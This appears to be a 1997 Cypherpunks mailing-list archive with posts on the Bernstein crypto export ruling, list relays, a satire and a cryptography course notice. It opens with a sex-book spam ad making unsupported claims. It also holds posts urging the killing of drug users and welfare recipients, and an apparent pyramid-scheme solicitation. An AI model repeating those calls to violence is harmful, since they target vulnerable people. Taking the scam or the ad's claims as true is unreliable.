partner...the ability to extend the duration of your orgasms is one hell of a great skill! Men, through the ages, have died pursuing lesser pleasures. You can know women (and their bodies) better than they do. Most importantly, you will understand that a woman's most responsive sexual organ is her....Brain. Although this may not sound "politically correct"... woman are different than men! And, I've observed that most Masters have (or develop) an intuitive understanding of what women expect and desire. They accept that their ultimate sexual success starts with how well they understand the erogenous zone between a woman's ears. No doubt, women think about sex differently than men do. During the last eight years of my research, I have spent considerable time questioning women about sex. During my counseling sessions with couples, I was particularly interested in learning about the women's unspoken, secret fantasies, needs and wants. Women seem to find it easier to talk about such things to a professional counselor than to their partners. And, fortunately, for you, I have documented these fantasies, needs and desires. You can have the opportunity to experience the true limits of your (or her) sexual potential, by understanding what women really want and expect. This knowledge virtually guarantees that you have a willing and completely stimulated partner...someone that wants to "push that envelope" as much, or more, than you do! You can become skilled in ways to learn a woman's most personal desires. No two women have exactly the same fantasies, There are proven communication techniques to help you do this, and practicing these techniques can have a tremendous effect on your ability to sexually interest a woman. You can determine the best approach to successfully interest a particular woman in sex. More importantly, it will assure that you she is "in the mood" for the hottest, most exciting sort of sexual experimentation. If you've ever wondered why you sometimes see beautiful, sexy women with seemingly-ordinary guys, (other than immense trust funds or blackmail) this is the reason...those "ordinary" guys have learned how to know, and fulfill, these women's most secret fan Masters have a solid grasp (pun intended) of the basics of the female anatomy. The purpose of our seminars is to help men become incredible lovers. But, if your goal was just to be a great lover, you could achieve that with a better knowledge of the female anatomy based upon the latest scientific sexual research). With a few diagrams, and a little practice, most any man can be confident in his ability to please most any woman. This is not rocket science! But, it is science. You can know the difference between a clitoral or vaginal orgasm. They know which type women experience most frequently, and can determine which type she is having. Masters are very familiar with the famous G Spot...and you can be too! They have much experience with its amazing capacity to render a woman virtually powerless to her sexual passions! You can easily locate the G Spot and know how to best stimulate it. This knowledge, alone, will make you very much "In Demand" with women. You can avoid the FIVE FUNDAMENTAL MISTAKES OF FEMALE STIMULATION. Mostfemales are capable of achieving multiple orgasms during a lovemaking session. If your woman is not experiencing this type of pleasure with you, you may be making one (or more) o Finally... your approach to lovemaking can be based upon scientifically-sound principles, instead of luck and superstition! Avoiding these fundamental mistakes gives you the ability to easily, and consistently, bring your partner to orgasm after orgasm. You can be an expert at the art of oral sex. Not all Masters "love" performing oral sex, but all are extremely competent at this critical sexual skill. Almost universally, women love to receive oral gratification and they strongly appreciate a man that can bring her to intense climaxes in this way. Masters have the ability to give their women the ultimate sexual pleasure...The Female Ejaculatory Orgasm. Women describe this type of orgasm as very different from a "normal" orgasm. This type of orgasm feels as if it comes from an area deeper wit Now you can give your woman the sexual "gift" that she deserves. I am sure that you are interested in giving her the very best of everything. And, sexually, there is no better gift than helping her to discover this amazing ability. Once you have shown how You will be pleasantly surprised at how often she initiates your lovemaking sessions. According to medical journals, it would appear that less than 1% of women regularly have this experience. Yet, Masters reported that they could bring their women to this Once introduced to this type of orgasm, women are generally capable of it whenever they desire. You can learn the Masters' "Perfect Sex Position," scientifically-designed to virtually guarantee that a woman can orgasm from intercourse, simultaneously with your climax. You've no doubt heard the phrase, "There is nothing new under the sun." Don't believe it! Millions of years of evolution, sexual and otherwise, and it is only in the past 20 years that science has discovered that there is a "new" and "different" sex position...designed for both partners' maximum pleasure. Although you may have accidentally stumbled onto something close to this technique, Masters know exactly how to achieve this "Perfect Position", every time, and so can you. If you learn nothing else, but this one position, your woman will thank you...forever. You can take advantage of the "other benefits" of a supercharged love life. I am confident that you can learn the physical skills/tricks to make you a virtual "sex machine." But, ultimately, your true satisfaction with your sex life will have to do with attitude. Masters have more than just a "technical" knowledge. Any good piano piano...it takes much more to become a piano Maestro...it takes a passion for music and a dedication to excellence. Similarly, becoming a Sex Master requires that you understand that there is more to sex than just the physical aspect. True Masters approach sex as the magical, mystical activity that it is. And, Masters understand how to use what they have learned, sexual It amazes me. Sex is everywhere.... television, movies, books and magazines. It is estimated that the average male has a sexual thought every 19 seconds! It's been thirty years since the sexual revolution. Computer scientists are working on developing virtual sex. Yet, most men's real sex lives are still absolutely boring. Worse than boring.... they are downright disappointing. I am convinced that most men do not enjoy sex. Really! I make my living speaking and writing about sexual performance. I have had the opportunity to speak with thousands of men Many of these men open up to me. And very, very few of them are truly satisf Before attending one of our seminars, many men are frustrated with their sexual abilities because they believe ... "You Either Have it Or you Don't." This is, without a doubt, the biggest misconception that unsuccessful lovers have. If you don't have it, you can develop it. Your sexual ability and satisfaction can be completely within your control. With the exception of those men that have an actual medical problem, only the proper knowledge and training is necessary to become sexually proficient. This feeling of control will ignificantly increase your satisfaction with your love life. "If sex is great, in a relationship, its only 10% important. If it isn't...its 90% important!" Masters have learned how "mind-blowing" sex can be used to make their relationships better. Although great sex does not guarantee a great relationship, it can be a wonderful start. Many of the skills necessary to becoming a sexual master are perfect for developing a more open and intimate relationship. In the past, only personal clients or participants in S.P.I. clinics had the opportunity to learn the secrets Mastering Sexual Performance in such a complete and powerful way. But, I have recently finished a book, SEXUAL MASTERY FOR THE NINETIES. This book is a comprehensive summary of my eight years of research, counseling and clinical presentations. IMPORTANT: THE INFORMATION IN THIS BOOK IS NOT THE SAME, GENERAL (AND USELESS) SEXUAL ADVICE YOU MAY BE FAMILIAR WITH. IT IS ONE HUNDRED (100) PAGES OF THE MOST SPECIFIC,EXPLICIT AND DETAILED COMPILATION OF POWERFUL AND EFFECTIVE SEXUAL PERFORMANCE TECHNIQUES EVER PRINTED. Here is a partial list of the contents... MASTER'S SECRETS TO MAINTAINING AN EVERLASTING ORGASM HOW TO BE A MULTI-ORGASMIC MALE ACHIEVING THE NON-EJACULATORY ORGASM...THE NEXT LEVEL OF CONTROL AND PLEASURE EXTENDING YOUR ORGASMS KNOWING YOUR WOMAN'S ANATOMY...BETTER THAN SHE DOES FEMALE ORGASMS: CLITORAL, VAGINAL? THE MOST POWERFUL SPOT IN THE UNIVERSE: THE "G" SPOT THE 5 FUNDAMENTAL FEMALE STIMULATION MISTAKES MASTERFUL ORAL SEX..."A TASTE OF SEXUAL SUCCESS" THE FEMALE EJACULATORY ORGASM WOMEN'S DEEPEST NEEDS AND DESIRES REVEALED COMMUNICATION TECHNIQUES FOR LEARNING ANY WOMAN'S PERSONAL FANTASY THE PERFECT SEX POSITION Look what is being said about this powerful book... "My wife loves how enthusiastic I am in bed. Before I finished this book, I was starting to get anxious about sex.... I just didn't feel in control. One night she even joked about the fact that I was no longer 22 years old D.G., 31 Pittsburgh, PA "This information would have saved my first marriage... I guarantee you that it will help me to make this one last forever! I spent twelve years with first wife, and she practically never pushed me for sex. Since reading yo S.L., 39 Sacramento, CA "This is the most specific and detailed presentation of effective sexual performance techniques I have ever seen. I am a subscriber to Mr. Irwin's newsletter, SEXUAL MASTERY NEWS. Since attending one of his clinical presentations to professionals, four Dr. R.S., Ph.D. , 47 Los Angeles, CA "I'll be honest, I use a lot of this stuff when I'm alone... This book has given me a ton of new ideas for how to make masturbating more intense. I can make my erections last for over an hour, sometimes. And I can make my orgasms last almost 45 seconds. R. M., 26 Chicago, IL "The 'perfect sex position' really is perfect! Well, at least my batting average is perfect since starting to use it...Before, Ann never climaxed during intercourse. I thought that there was something wrong with her or me. In the past month, she has climaxed during intercourse (at least once!) every time. This is what I always thought sex was supposed to be." M.K., 35 New York, N.Y. "Thirty two years old and I hadn't really ever found a 'G Spot.' Now I could find it with my hands tied behind my back...and we may try that soon! Until I read your book, I was convinced that all female orgasms werebasically a clitoris thing. So did my fiancee...until now. She told me that the orgasms I've been giving her lately (using your G Spot stimulation techniques), are completely different, deeper and more satisfying." J. A., 32 Houston, TX NOW YOU HAVE THE OPPORTUNITY TO LEARN THE LOVEMAKING SECRETS OF THE MASTERS, COMPLETELY RISK FREE*! Thousands of Sexual Mastery seminar participants have paid $395.00 to attend our weekend programs. I am about to launch a national infomercial advertising campaign based upon my SEXUAL MASTERY seminars. Through this infomercial, this book will sell for $69.95. I am presently offering SEXUAL MASTERY FOR THE NINETIES at only $24.95... for internet orders received before September 8, 1997. To obtain your own personal edition of SEXUAL MASTERY FOR THE NINETIES, send a Check or Money Order for $28.95 ($24.95+$4.00 S/H) to: BOOK OFFER S.P.I. 910 BEAVER GRADE ROAD DEPT. 3015-S826 CORAOPOLIS, PENNSYLVANIA 15108 * S.P.I. Unconditional Money-Back Guarantee: Your edition will be shipped IMMEDIATELY. "If you are not absolutely satisfied, for any reason, return the book for a complete refund. We will politely return your money, no questions asked." Wishing you Mastery in all, Robert Irwin Executive Director Sexual Performance Institute From declan at pathfinder.com Tue Aug 26 06:28:16 1997 From: declan at pathfinder.com (Declan McCullagh) Date: Tue, 26 Aug 1997 06:28:16 -0700 (PDT) Subject: Commerce Department encryption rules declared unconstitutional In-Reply-To: <3.0.3.32.19970825235313.006d8f0c@popd.netcruiser> Message-ID: I think that's about right. One of the important questions was how broadly Patel would rule, whether her ruling would apply just to Bernstein & associates or whether she would enjoin the government from enforcing ITAR/EAR at all. Unfortunately, she chose the former. But look on the bright side: her narrow decision may be less likely to be reversed, no? -Declan On Mon, 25 Aug 1997, Jonathan Wienke wrote: > >Patel barred the government from "threatening, detaining, > >prosecuting, discouraging, or otherwise interfering with" anyone > >"who uses, discusses, or publishes or seeks to use, discuss or > >publish plaintiff's encryption programs and related materials." > >Daniel Bernstein, now a math professor at the University of > >Illinois, filed the lawsuit with the help of the Electronic > >Frontier Foundation. > > So if someone posts a few lines of source code to coderpunks, the > government reserves the right to prosecute, unless the poster's name is > Daniel Bernstein, and the algorithm is Snuffle 5.0. The judge seems to be > saying "I think Bernstein's case has merit, so I will order the government > to stop hassling him, but since I am too chickenbleep to challenge the > unconstitutional usurpation of power on the part of Clinton, Congress, the > State Dept., and the Dept. of Commerce, I will pass the buck and let the > issue be decided on appeal." The decision seems to be a step in the right > direction, but a VERY small one. From sunder at brainlink.com Mon Aug 25 15:29:48 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 26 Aug 1997 06:29:48 +0800 Subject: heart In-Reply-To: Message-ID: On Mon, 25 Aug 1997, ? the platypus {aka David Formosa} wrote: > Ok I'll take this slowly > > 1) All of humanity is equaliy human > > 2) If someone is made less then human then we all become less human by > that amount > > For esample if Alice, Bob and Paul all have say 10 units of humanity. Now > Paul shoves a plunger up Bobs datehole, we could say that Paul should > have 5 units of humanity. By rule one every body else is now also 5 > units. Maybe I am too slow brained (ha!) Lemme get your model straight - and it is your model: Okay, so now everyone is down to 5 units. Now say that Joe takes a plunger to Bob as well and everyone is down yet another 5 points, therefore all humans, including both Alice and Bob are down to zero points making them all inhuman. At this point the perpetrator, uninvolved and the victim are all inhuman. In the above case, Alice is uninvolved, yet in your model she is now inhuman. Further, poor Bob is left with two punctures to his butthole and is deemed inhuman as well? Well, that's certainly equal treatment for victim, perpetrator and uninvolved. Given X humanity points to all humans and given over more than 4,000,000 years of existance, I'd say we'd all be in the negative humanity points by now. Solution to your model in trying to keep Humanity Points: Now if Bob pulled out a gun and humanely put both Paul and Joe out of Bob's misery, humanity's humanity points wouldn't be effected. Thus in your model, killing all the perpetrators (in a humane way of course, without malice) would solve the problem. Better yet, humanely nuke everyone off the planet, that way nobody can possibly commit any crimes, thus keeping humanity points constant. Sorry, I don't accept your model as it is clearly invalid. Are you begining to see how silly this is, or do I need to send the toilet plunger troops after you? :) > As you can planly see assining humanitiy and inhumanity is a pointless > esasize. So quit trying to push these silly assed morality models on us already. You came up with this shit, I've twice more than clearly shown you how silly it is. Give up already and quit bothering us with illogical bullshit. =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From whgiii at amaranth.com Mon Aug 25 15:34:06 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 26 Aug 1997 06:34:06 +0800 Subject: Welfare Solution #389 In-Reply-To: Message-ID: <199708252215.RAA03477@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In , on 08/26/97 at 02:55 AM, ? the Platypus {aka David Formosa} said: >-----BEGIN PGP SIGNED MESSAGE----- >On Mon, 25 Aug 1997, Ray Arachelian wrote: >[...] >> Want to end the drug problem? Sell the drugs dirt cheap. Treat driving >> while high the same as driving while drunk. >Of cause such actions should be done within the context of a harm >minimlisation scheme (needle echanged ect) Amuch better solution would be to put a synthetic Morphine out on the streets that had a mortality rate of say 1/5 for every uses. At least these junkies would the be serveing a usfull purpose as worm food. - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNAH1+o9Co1n+aLhhAQFR3QP/YL4Xo8o01DgKTJSKuowv0QqsvvNWwXzn 7t10CzUIn+xOKN0dECTQtSU0aq3SlLfQ4VHKsfILqcbQKfD0MqIbSx4WVFxOl81r 1SpgNPPph3pKyCtIgCwuuonALv2nriRtLtBWxBfbl4/1Bcj2PVsf6huNmyMTvKyy WPApo39AG38= =XnEa -----END PGP SIGNATURE----- From whgiii at amaranth.com Mon Aug 25 15:36:03 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 26 Aug 1997 06:36:03 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: Message-ID: <199708252218.RAA03502@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In , on 08/26/97 at 02:42 AM, ? the Platypus {aka David Formosa} said: >> Uh, don't you mean "instead of paying a large amount of money to the >> government and a small amount of money for a security system, you now >> just pay a small amount of money for the security system"? >No I mean what I said, resurch indercates that welfare is >cheeper then law enforcement and securaty for equile amounts of reduction >in crimes. Bullshit. The majority on increased crime from the Welfare leaches could be handled with a $200 shotgun and a $0.50 Deer Slug. This seems *much* cheaper then the $25-$30,000 being spent per Welfare leach right now not to mention the billions being spent in overhead in the varrious government agencies that manage welfare. - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNAH2zI9Co1n+aLhhAQGLewQAl5xCXzlkKIXHFgSHw6MlMPUregRUeQdP J1fzGeoYUtNsGByWV7huku3Zqla64m+D1Z+H87EKoxiLBCOC0bwXmAvo1e3gLAIL 1fkx6To4qcFeDPANZ/w4rNxAX8pSbrUd3HrMnDKHTOI6SvbdEwR/X+J4ExLngw/d VEI4C9z5HF8= =jFBr -----END PGP SIGNATURE----- From gnu at toad.com Tue Aug 26 06:43:25 1997 From: gnu at toad.com (John Gilmore) Date: Tue, 26 Aug 1997 06:43:25 -0700 (PDT) Subject: Bernstein decision In-Reply-To: <199708261310.GAA02728@toad.com> Message-ID: <199708261343.GAA03055@toad.com> [There will be many chances to talk to the press today about this. Call them up. Tell them what it means.] Lucky Green said: > The ruling provides an interesting data point, but is inconsequential > to the software industry. Jonathan Wienke said: > The decision seems to be a step in the right > direction, but a VERY small one. However you slice it, getting a Federal judge to declare both crypto export control regimes unconstitutional is a major accomplishment. This court case has done what a decade of lobbying, two decades of citizen activism, and a decade of crypto software entrepreneurship were not able to do. (Though all these things contributed greatly.) It stopped the export-control machinery in its tracks. Last December, the State Department stopped issuing crypto export licenses. Hugh Daniel had applied for one; it came back marked "returned without action". We later found out, by comparing notes with other export applicants, that this was a general policy; they didn't want to risk enforcing an unconstitutional law. They never did resume. A few weeks later, the Commerce Department started issuing "EI" export licenses under new regulations. Now there's no other department to turn to. We haven't found a third law that lets them regulate crypto export or use. And Judge Patel mentioned in her decision that "the government cannot avoid the constitutional deficiencies of its regulations by rotating oversight of them from department to department". Though she decided that they had not deliberately evaded her previous ruling, she's warning them not to try it. The next few weeks should be very interesting. There's a mailing list for announcements in the case, as appeals are filed, final orders come out, any hearings are scheduled, etc. Send mail to containing the line "subscribe bernstein-announce". These announcements will also automatically go to cypherpunks, but there are people who don't want the volume but do want to get the news. Let them know. Thanks to all the cypherpunks for your ongoing support and participation in the case! John From trei at process.com Tue Aug 26 06:49:35 1997 From: trei at process.com (Peter Trei) Date: Tue, 26 Aug 1997 06:49:35 -0700 (PDT) Subject: lack of evolution (So What!) Message-ID: <199708261349.GAA03140@toad.com> Feanor writes: > On Aug 25, 21:41, Ray Arachelian wrote: > } Subject: Re: lack of evolution (So What!) > > > > On Mon, 25 Aug 1997, Peter Trei wrote: > > > > > One factor which everyone seems to be overlooking in this > > > thread is the future impact of biotechnology. > > > > > > > > I see someone's been recently reading Beyond This Horizon by Heinlein. :) > > Sounded a lot more like Sterling/Crystal Express, the Shaper/Mechanist section, > to me. Actually, Vernor Vinge is a much bigger influence. Peter Trei trei at process.com From ichudov at Algebra.COM Mon Aug 25 15:55:08 1997 From: ichudov at Algebra.COM (Igor Chudov @ home) Date: Tue, 26 Aug 1997 06:55:08 +0800 Subject: List Subscriptions / Re: Prior Restraint on Publishers In-Reply-To: Message-ID: <199708252241.RAA06051@manifold.algebra.com> Prof. Tim May wrote: > At 9:04 PM -0700 8/24/97, Anonymous wrote: > >Tim May wrote: > >> By the way, which list address are you now subscribed to...I switched from > >> algebra. com to cyberpass.net, but now expect to see 2-3 hours delay before > >> posts appear. > >> > >> (This applies to others, too. I'm getting replies to my posts, when sent > >> directly to me, literally hours before seeing it on the list. Someone > >> mentioned subscribing to toad.com, which, to tell the truth, I thought had > >> vanished as a list origination site months ago.) > > > >If you subscribe to cypherpunks-unedited at toad.com you will get almost > >immediate receipt of toad.com posts much of the day. Algebra.com is > >generally only a short time lag behind, although this varies (and you > >get duplicates of the toad.com posts). > >The advantage of toad.com is that it gives you feedback as to the > >time-lag of the distributed lists. The advantages of the distributed > >lists is that you can change among them if one is temporarily having > >problems. Remember that distributed lists receive traffic from toad.com, BUT NOT VICE VERSA. > Ah, so when I send my messages to "cypherpunks at algebra.com" they come back > more quickly from toad.com? Somehow I doubt this. I doubt that, too. > I've been sending nearly all of my posts to either the algebra.com or the > cyberpass.net addresses, and the toad.com address is set to expire, or so > John told us when he gave us a deadline for finding another site. I've > mentioned this a couple of times, and yet some of you seem to think the > toad.com address is the preferred, fastest one. It may be very fast due to the fact that not as many users subscribe to it, but it does not carry the full traffic because no one feeds it. > Would some of the operators of the distributed lists comment on the time > delays, on the topology of the interlinked distributed list, and on what > role, if any, toad.com continues to play in the process? Igor, Lance, Jim, > John? I am not even sure that the topology is known by someone. I can only state that algebra forwards messages to ssz and cyberpass. I'll let the other operators state their own connections. > Posts like this one from Anonymous, while perhaps accurate (or perhaps not, > I really don't know) are not as convincing as words straight from those > involved. - Igor. From jp at mlmail.com Tue Aug 26 06:57:08 1997 From: jp at mlmail.com (jp at mlmail.com) Date: Tue, 26 Aug 1997 06:57:08 -0700 (PDT) Subject: Some Easy Money ! Message-ID: <3.0.1.32.19970824152213.006c1d78@mlmail.com> Some Easy Money ! Here's a very easy little program that I got into. Should be very easy to get my investment back and much more. My sponsor in just a couple days has gotten 94 responses back and they are each worth $10. You send just $10 to 5 people and to Power Page. Your total cost is $60. For every person you sign up and everyone they sign up for 5 levels, you'll earn $10. The nice thing is that the people send it directly to you. You don't have any company in between that cuts you a check when they decide to. It comes immediately. Sponsor as many people as you like. Sponsor 100 and earn $1000. If each of them just sponsors 1, that would be another $1000 for you. Sign up one person who can do that and he/she could sign up 100 or 1000 earning you $1000 or $10,000.) For the money you get software for creating web-pages. It's designed for the novice. You also get the web-space to put it up. Your website you will get even keeps track for you of how many hits you get and who has signed up so you can watch for those $10 checks coming in the mail. Juergen mailto:jp at mlmail.com ******************************************************* For detailed information please send an empty message to my autoresponder mailto:jpr at mlmail.com ******************************************************* From remailer at bureau42.ml.org Tue Aug 26 07:11:10 1997 From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer) Date: Tue, 26 Aug 1997 07:11:10 -0700 (PDT) Subject: There's something wrong when...Shitty Laws! Message-ID: <+u6M/NucrBPL5LOmnZJmew==@bureau42.ml.org> I think I first realized just how much Tim May's .sig lines are a genuine harbinger of the future when I arrived at www.compost.org to find that there are "Compost Standards in Canada," as explained by The Composting Council of Canada. In short, if I wanted to stack some turds on top of each other, then I had to keep in mind that: "In Canada, three organizations are responsible for the development of standards and regulations for compost and composting: Agriculture and Agri-Food Canada (AAFC), the provincial and territorial governments, and the Standards Council of Canada (SCC) (through the Bureau de normalisation du Qu�bec (BNQ)). This collective responsibility reflects government regulatory requirements (of both the AAFC and the provinces and territories) as well as voluntary industry initiatives (BNQ)." { The word "voluntary" was in _bold_ print! (Mandatory-Voluntary?) } When I first got the urge to phone these people up and scream, "YOU'RE TALKING ABOUT _SHIT_, FOR SHIT'S SAKE!" was when I read that, "All compost that is sold in Canada must comply with the requirements of the Fertilizers Act. This includes provisions for product safety, benefit claims and labeling." Product safety? (Turds are dangerous? You can 'slip' on them?) Benefit claims? (You mean turds _don't_ cure cancer?) Labeling? (It's SHIT! It's hard to fool people about that.) I found out I could avoid fines and imprisonment by reading, "...a National Standard of Canada entitled: 'Organic Soil Conditioners - Composts (BNQ); Guidelines for Compost Quality (CCME); and future amendments to the Fertilizers Act and Regulations (AAFC).'" "Future amendments?" I had to worry about past turds coming back to haunt me, if the laws should change in the future? I was consoled by the fact that these requirements were in the best interests of the different organizations involved, and to ensure that all of the turds in Canada are "consistent." "These provide for a significant level of national consistency by containing virtually identical technical requirements while ensuring that the mandates and interests of the different organizations are realized." My consolation was short-lived, however, as I soon found out that if I didn't understand the proper turd linguistics involved, I could still be in big trouble: "Definition of Compost" "'Composting' and 'compost' are two distinct terms. The former refers to the bio-oxidation process and the latter refers to the resulting product: stabilized organic matter." "As agreed upon by the CCME, BNQ and AAFC, compost is: 'A solid mature product resulting from composting, which is a managed process of bio-oxidation of a solid heterogeneous organic substrate including a thermophilic phase.'" Then, of course, to remain free from fine and imprisonment, I had to be aware of the: Classification of Compost according to: BNQ Standards CCME Guidelines AAFC Regulations As well as keeping in mind: "The Four Criteria: Maturity, Foreign Matter, Trace Elements and Pathogens" Maturity? (You can 'molest' a turd? I could be a 'turdophile'?) Foreign Matter? (Hey! There's a turd in your turd!) Trace Elements? (I have to give the turds multi-vitamins if they don't measure up?) Pathogens? (They mention checking for "sharp objects" in it. If it is a 'long' sharp object, is it illegal to carry the turd in California?) After memorizing the Fertilizer Act and all other regulations and legislation involved, I piled some turds in my yard, next to the garden. It was a week later, when I began to follow the instructions to turn it over and mix it up that I was arrested for "being involved in 'bad shit'." The worst part is that because I was turning it over and stirring it when arrested, I will get an "extra five years" for "use of encryption in the commision of a composting crime." ShitMonger From jya at pipeline.com Tue Aug 26 07:15:17 1997 From: jya at pipeline.com (John Young) Date: Tue, 26 Aug 1997 07:15:17 -0700 (PDT) Subject: Commerce Department encryption rules declared unconstitutional Message-ID: <1.5.4.32.19970826140833.00860dd0@pop.pipeline.com> Declan wrote: >I think that's about right. One of the important questions was how broadly >Patel would rule, whether her ruling would apply just to Bernstein & >associates or whether she would enjoin the government from enforcing >ITAR/EAR at all. > >Unfortunately, she chose the former. But look on the bright side: her >narrow decision may be less likely to be reversed, no? Does this not shift now to Peter Junger's suit: same issues, broader challenge, same opposing arguments? Did Patel rule narrowly in Bernstein to set the stage for the broader case in the works? BTW, is there a suit being readied to follow Peter's? Karn II? PRZ 6.0? What say, Peter, Lee, Cindy, Phil, Phil, Anthony et al? From declan at well.com Tue Aug 26 07:22:55 1997 From: declan at well.com (Declan McCullagh) Date: Tue, 26 Aug 1997 07:22:55 -0700 (PDT) Subject: Commerce Department encryption rules declared unconstitutional In-Reply-To: <1.5.4.32.19970826140833.00860dd0@pop.pipeline.com> Message-ID: This is from memory, and I'm on vacation so I don't have my notes here... But didn't Peter originally attempt a facial challenge, but the judge questioned whether he had standing? Then he changed tactics to follow Bernstein/Karn more closely and //not// mount a facial challenge... -Declan On Tue, 26 Aug 1997, John Young wrote: > Declan wrote: > >I think that's about right. One of the important questions was how broadly > >Patel would rule, whether her ruling would apply just to Bernstein & > >associates or whether she would enjoin the government from enforcing > >ITAR/EAR at all. > > > >Unfortunately, she chose the former. But look on the bright side: her > >narrow decision may be less likely to be reversed, no? > > Does this not shift now to Peter Junger's suit: same issues, broader > challenge, same opposing arguments? Did Patel rule narrowly in > Bernstein to set the stage for the broader case in the works? > > BTW, is there a suit being readied to follow Peter's? Karn II? PRZ 6.0? > > What say, Peter, Lee, Cindy, Phil, Phil, Anthony et al? > > > > > > From rah at shipwright.com Mon Aug 25 16:50:17 1997 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Aug 1997 07:50:17 +0800 Subject: Forbes article on Financial Cryptography is coming In-Reply-To: Message-ID: It's out. Sameer made the cover of Forbes with a picture captioned "This man wants to overthrow the government". Hot damn... You can see it at Cheers, Bob Hettinga (Who, if he isn't dead already from making the featured "deductible junket" in Wired, can die now...) ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From tcmay at got.net Mon Aug 25 17:01:51 1997 From: tcmay at got.net (Tim May) Date: Tue, 26 Aug 1997 08:01:51 +0800 Subject: Anybody with a Ricochet willing to Visit? Message-ID: This is mostly directed at Bay Areans. Anybody with a Metricom Ricochet modem willing to stop by my place in Corralitos and help me determine if I can get some kind of coverage in my area? (Yes, I know about the coverage maps at www.metricom.com and such....the coverage is show extending as far down the coast as parts of Aptos, but ending before my area, which is about 7 miles, over a ridge, from Aptos. East of Santa Cruz.) At a recent party in Boulder Creek, I saw folks getting coverage by moving their laptops around, and BC is not on the official coverage map. So what I'd like to do is see if my area can actually get reasonable signal. I'll provide the beer.... (I may have another Cypherpunks party at my place in September or October, but I'm more leery now of issuing an open invitation than I have been in the past. A lot of odd people read the list. And I'd hate to have any Feds see the invitation and then show up....never know what they might see or hear at a party, or what gifts they might leave behind, like bugs or dope. So if I have another party, it may not be an "open to all who see the invitation" one, and may have to be limited to those I have actually met.) Meanwhile, I'm interested in Ricochet coverage in my area. Contact me if you have a Ricochet on your laptop and if you are interested in visiting. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rah at shipwright.com Mon Aug 25 17:21:52 1997 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Aug 1997 08:21:52 +0800 Subject: Graduate Cryptography Course at WPI Message-ID: --- begin forwarded text X-Authentication-Warning: goya.WPI.EDU: christof owned process doing -bs Date: Mon, 25 Aug 1997 17:21:25 -0400 (EDT) From: Christof Paar To: DCSB cc: Lisa Jernberg Subject: Graduate Cryptography Course at WPI MIME-Version: 1.0 Sender: bounce-dcsb at ai.mit.edu Precedence: bulk Reply-To: Christof Paar This is an announcement for my graduate course in cryptography. Detailed information is included below. Please note that (i) the course is offered on Tuesday nights this semester and (ii) that it is cross-listed as CS 578. The course has been taught to almost 200 people in industry and graduate students over the last few years. Industry participants include engineers from GTE Government Systems, RSA, Philips Research, DEC, HP, Bay Networks, and others. For questions about registrations, please contact Lisa Jernberg at jernberg at wpi.wpi.edu Please feel free to contact me if there are any further questions about the class. Best regards, Christof Paar ************************************************************************* Christof Paar http://ee.wpi.edu/People/faculty/cxp.html Assistant Professor email: christof at ece.wpi.edu Cryptography Group phone: (508) 831 5061 ECE Department, WPI fax: (508) 831 5491 100 Institute Road Worcester, MA 01609, USA ************************************************************************* **************************************************************************** Worcester Polytechnic Institute EE 578/CS 578: CRYPTOGRAPHY AND DATA SECURITY Fall '97, Tuesday, 5:30-8:30 pm, AK 233 Starting date: September 9, 1997 INTRODUCTION It is well known that we are in the midst of a shift towards an information society. The upcoming generation of digital information systems will provide services such as: - wireless LAN and WAN computer networks - multi-media services (e.g., high quality video-on-demand) - smart cards (e.g., for network identification of electronic purse) - electronic banking/digital commerce These and other new information-based applications will have far reaching consequences. As this happens, security aspects of communication systems are of growing commercial and public interest. Unfortunately, these aspects have been widely underestimated or ignored in the past. Today, however, there is high demand for expertise and high quality products in the field of information security and cryptography. WPI's graduate course EE 578/CS 578 provides a solid and broad foundation in the area of cryptography and data security. After taking the course students should have an overview of state-of-the-art cryptography. In industry, they should be able to carefully choose and design a security scheme for a given application. The course also serves as an introduction for students who are interested in pursuing research in cryptography. There are several opportunities for Master's and PhD theses in the field of cryptography. COURSE DESCRIPTION This course gives a comprehensive introduction into the field of cryptography and data security. We begin with the introduction of the concepts of data security. Different attacks on cryptographic systems are classified. Some pseudo-random generators are introduced. The concepts of public and private key cryptography is developed. As important representatives for secret key schemes, DES, IDEA, and other private key algorithms 